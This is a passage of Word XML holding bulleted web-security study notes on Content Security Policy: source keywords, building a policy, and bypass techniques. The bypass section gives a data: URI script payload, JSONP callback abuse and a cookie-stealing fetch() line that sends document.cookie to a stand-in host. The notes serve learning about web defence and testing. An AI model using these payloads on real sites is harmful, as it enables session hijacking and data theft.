    <w:p w14:paraId="3E5E42CA" w14:textId="59395665" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B43E21" w14:textId="4B1FC1E7" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>following directive, list of sources specify where from the particular resources are allowed to be loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5EA95D" w14:textId="0515558E" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Common Sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7FD552" w14:textId="0B075161" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>* - wildcard, content for specific directive can be loaded from anywhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C9A2D2" w14:textId="70066616" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>recommended to not use for script-src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40873EEC" w14:textId="02CA6A23" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘none’ – opposite of wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A566A27" w14:textId="06327A6A" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. media-src ‘none’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598EE044" w14:textId="6EC936B2" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘self’ – allow resources to load that are hosted on the same protocol, hostname, and port as the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38444D1D" w14:textId="4FA76C79" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘unsafe-inline’ – allows the use of inline stylesheets, inline JS, and event attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F931BA" w14:textId="264F28A9" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>considered unsafe and should be avoided</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D7B4A2" w14:textId="3BE7D5A8" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘unsafe-eval’ – allows additional JS code to be executed using functions such as eval() by JS code already permitted within the policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC61F3" w14:textId="5FB04DBC" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>usually safe unless a vuln is found in the code that runs on the page or script-src sources are loose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A31CF6" w14:textId="096D96D5" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>such as scripts loaded from CDNs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C401AD5" w14:textId="5B759B6C" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>example.com – allow resources from the domain but not subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D85CB8" w14:textId="000E121C" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>*.example.com – allow resources to load from all subdomains but not base domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D97797" w14:textId="08842437" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data: - allow resources to be loaded from a data url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E0F7F" w14:textId="037A5DA2" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsafe for script-src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0866CDAC" w14:textId="44BD0F6C" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nonce – allows resources to load if it has a matching nonce attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405831E" w14:textId="1543D7FA" w:rsidR="00914890" w:rsidRDefault="00914890" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. script-src ‘unsafe-inline’ ‘nonce-&lt;nonce&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C154CE" w14:textId="0306557C" w:rsidR="00FA39AB" w:rsidRDefault="00FA39AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sha256- uses hash encoded via base64 as a checksum to verify content of the resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A3B35" w14:textId="30DAE5C8" w:rsidR="00FA39AB" w:rsidRDefault="00FA39AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>generate one using report-uri.com or running on web page with restrictive CSP header and extracting hash from console error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ADEC31" w14:textId="3B15371E" w:rsidR="00FA39AB" w:rsidRDefault="00FA39AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Creating a Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F4E16" w14:textId="6C650DB9" w:rsidR="00FA39AB" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId148" w:history="1">
        <w:r w:rsidR="00FA39AB" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://report-uri.com/home/generate</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F74A2CE" w14:textId="15D49D56" w:rsidR="00FA39AB" w:rsidRDefault="00FA39AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When creating a CSP policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A4A4E4" w14:textId="31060E6B" w:rsidR="00FA39AB" w:rsidRDefault="00FA39AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>default-src ‘self’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5063DFD5" w14:textId="476B86A1" w:rsidR="00FA39AB" w:rsidRDefault="00FA39AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>all resources by default will only be allowed to load from your website and nowhere else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03189753" w14:textId="525F4914" w:rsidR="00FA39AB" w:rsidRDefault="00FA39AB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>adjust as needed if media is loaded from external sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C836141" w14:textId="65B195A7" w:rsidR="00F66545" w:rsidRDefault="00F66545" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>script-src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C70A32" w14:textId="51942F22" w:rsidR="00F66545" w:rsidRDefault="00F66545" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>specify full URL of script or a nonce/SHA hash of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE10710" w14:textId="5E748E30" w:rsidR="00F66545" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId149" w:history="1">
        <w:r w:rsidR="00F66545" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cdnjs.com/libraries/jquery</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03C84808" w14:textId="6AE7EB2C" w:rsidR="00F66545" w:rsidRDefault="00F66545" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Inline JS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E1066" w14:textId="4740C42B" w:rsidR="00F66545" w:rsidRDefault="00F66545" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need to use nonce generator on server-side or compute SHA hashes of inline scripts and include in policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB29258" w14:textId="44AD4327" w:rsidR="00F66545" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId150" w:history="1">
        <w:r w:rsidR="00F66545" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.npmjs.com/package/helmet-csp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="071479AC" w14:textId="2DEECDB5" w:rsidR="00F66545" w:rsidRDefault="00F66545" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for express based websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5660C3" w14:textId="1A538180" w:rsidR="00F66545" w:rsidRDefault="00F66545" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inline scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109BD648" w14:textId="0309ED37" w:rsidR="00F66545" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId151" w:history="1">
        <w:r w:rsidR="00F66545" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://report-uri.com/home/hash</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59F2A280" w14:textId="29CC355C" w:rsidR="00F66545" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId152" w:history="1">
        <w:r w:rsidR="00F66545" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/fcsonline/autocsp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C8C5FAB" w14:textId="2713DADF" w:rsidR="00F66545" w:rsidRDefault="00F66545" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bypassing a Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948025B" w14:textId="0D4013AF" w:rsidR="00F66545" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r w:rsidR="00F66545" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://csp-evaluator.withgoogle.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76B5B9AF" w14:textId="39DDED10" w:rsidR="00F66545" w:rsidRDefault="00F66545" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JSONP endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DC44A6" w14:textId="70F5D958" w:rsidR="00F66545" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>call a JS function in a response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FFDD5" w14:textId="1385D669" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if callback can be changed, could be used to bypass CSP and demonstrate PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F3C02" w14:textId="67913151" w:rsidR="00CA0383" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId154" w:history="1">
        <w:r w:rsidR="00CA0383" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/zigoo0/JSONBee</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24A48D22" w14:textId="5FE6C20B" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unsafe CSP Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF14E3" w14:textId="494EACB2" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>loading of resources from unsafe sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4417DB" w14:textId="151A9229" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allowing URIs or using ‘unsafe-inline’ source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765E18C" w14:textId="531DDC30" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bypass policy by moving payload to src attribute of script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B94F016" w14:textId="61C3D744" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0383">
        <w:t>&lt;script src="data:application/javascript,alert(1)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31262D1C" w14:textId="450C0DDE" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CE87E" w14:textId="07C643D5" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Get client to connect to attacker controlled webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C250091" w14:textId="6037C032" w:rsidR="00CA0383" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId155" w:history="1">
        <w:r w:rsidR="00CA0383" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://beeceptor.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7719C45E" w14:textId="6D47C08B" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or Burp Collaborator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B2845C" w14:textId="6BAF326B" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>setup SimpleHTTPServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00B163" w14:textId="19050EF9" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if website allows AJAX requests via connect-src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C1596" w14:textId="31097977" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create fetch request to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53859A07" w14:textId="2F27DAD6" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0383">
        <w:t>&lt;script&gt;fetch(`http://example.com/${document.cookie}`)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270319C3" w14:textId="0E2EE253" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>see cookies show up in access logs in beeceptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD46D8" w14:textId="7A814470" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if XSS vuln is found and CSP is bypassed, but information cannot be leaked with XHR requests or fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B64B0" w14:textId="7585EFE9" w:rsidR="00CA0383" w:rsidRDefault="00CA0383" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>connect-src may be blocking requests</w:t>
      </w:r>
    </w:p>
